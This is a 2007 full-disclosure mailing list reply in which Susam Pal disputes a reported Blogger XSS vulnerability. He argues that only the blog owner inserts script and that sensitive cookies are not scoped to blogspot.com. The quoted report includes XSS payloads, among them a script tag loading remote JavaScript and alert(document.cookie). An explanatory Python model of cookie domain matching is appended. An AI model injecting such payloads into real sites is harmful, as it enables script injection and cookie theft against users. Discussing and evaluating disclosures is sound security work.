Message-ID: <46BF3119.5020501@susam.in>
Date: Sun, 12 Aug 2007 21:41:05 +0530
From: Susam Pal <susam@...am.in>
To: Daniele Costa <info@...apware.it>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: BLOGGER XSS VULNERABILITY

Why is this a vulnerability? I can't see a way by which an attacker can 
insert JavaScript code into my blog.

 > I've noticed that for any blog hosted at blogspot.com the cookie will
 > be not shown.

The sensitive cookies are not maintained under blogspot.com, so allowing 
JavaScript in blogspot.com doesn't look like a threat or vulnerability.

 > Otherwise, if the blog is located inside your web site, the cookie
 > will be shown.

But I am the only one who is inserting the JavaScript in my blog. So, 
I'll end up stealing the cookies set for my domain. Why would I steal 
cookies set for my domain? I already know them because it is my website.

Regards,
Susam Pal
http://susam.in/

Daniele Costa wrote, On Saturday 11 August 2007 10:52 PM:
> ------------------------------------------------------
> BLOGGER XSS VULNERABILITY
> ------------------------------------------------------
> 
> Blogspot.com
> 
> Homepage: http://www.blogspot.com
> 
> and
> 
> Blogger.com
> 
> Homepage: http://www.blogger.com
> 
> Affected files:
> 
> Post's Input boxes
> 
> ------------------------------------------------------
> XSS DETAILS
> ------------------------------------------------------
> XSS vuln via injecting javascript code into any post.
> 
> Blogger doesn't sanitize user input during post process.
> Try injecting the following code into a post
> 
> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
> 
> or just the well known
> 
> <SCRIPT>alert(document.cookie);</SCRIPT>
> 
> or
> 
> <SCRIPT >alert(document.domain);</SCRIPT>
> 
> ------------------------------------------------------
> Proof Of Concept
> ------------------------------------------------------
> 
> http://pocasiculezza.blogspot.com/
> 
> -----------------------------------------------------
> HISTORY
> ------------------------------------------------------
> Discovered : 07/11/2007 by Daniele Costa
> Published : 07/11/2007 by Daniele Costa
> 
> 
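As an added illustration of the cookie-scoping argument made in this reply (not code from the thread or from Blogger), the following Python model of RFC 6265 domain matching shows which cookies a script running on a blog page could read through document.cookie. The hostnames and cookie names in the jar are constructed for the example.

```python
# Added example: RFC 6265 cookie domain matching, used to show why script on a
# blogspot.com blog page cannot read cookies scoped to blogger.com, while script
# on a self-hosted blog sees that site's own cookies. Cookie jar is constructed.
from __future__ import annotations
from dataclasses import dataclass


@dataclass(frozen=True)
class Cookie:
    name: str
    domain: str          # Domain attribute as stored (leading dot stripped)
    host_only: bool      # True when the cookie was set without a Domain attribute
    http_only: bool = False


def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 section 5.1.3: host equals domain, or host ends with '.' + domain."""
    request_host = request_host.lower()
    cookie_domain = cookie_domain.lower()
    if request_host == cookie_domain:
        return True
    return request_host.endswith("." + cookie_domain)


def script_visible_cookies(page_host: str, jar: list[Cookie]) -> list[str]:
    """Names of cookies that document.cookie on page_host would expose to script."""
    visible = []
    for c in jar:
        if c.http_only:
            continue  # HttpOnly cookies are never readable from script
        if c.host_only:
            if page_host.lower() == c.domain.lower():
                visible.append(c.name)
        elif domain_matches(page_host, c.domain):
            visible.append(c.name)
    return visible


# Constructed jar: a session cookie scoped to blogger.com (where the editor lives),
# a cookie on the blog's own blogspot hostname, and a cookie on a self-hosted domain.
JAR = [
    Cookie("blogger_session", "blogger.com", host_only=False),
    Cookie("blog_theme", "example.blogspot.com", host_only=True),
    Cookie("site_session", "example.com", host_only=False),
]

if __name__ == "__main__":
    print(script_visible_cookies("example.blogspot.com", JAR))  # ['blog_theme']
    print(script_visible_cookies("www.example.com", JAR))       # ['site_session']
```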
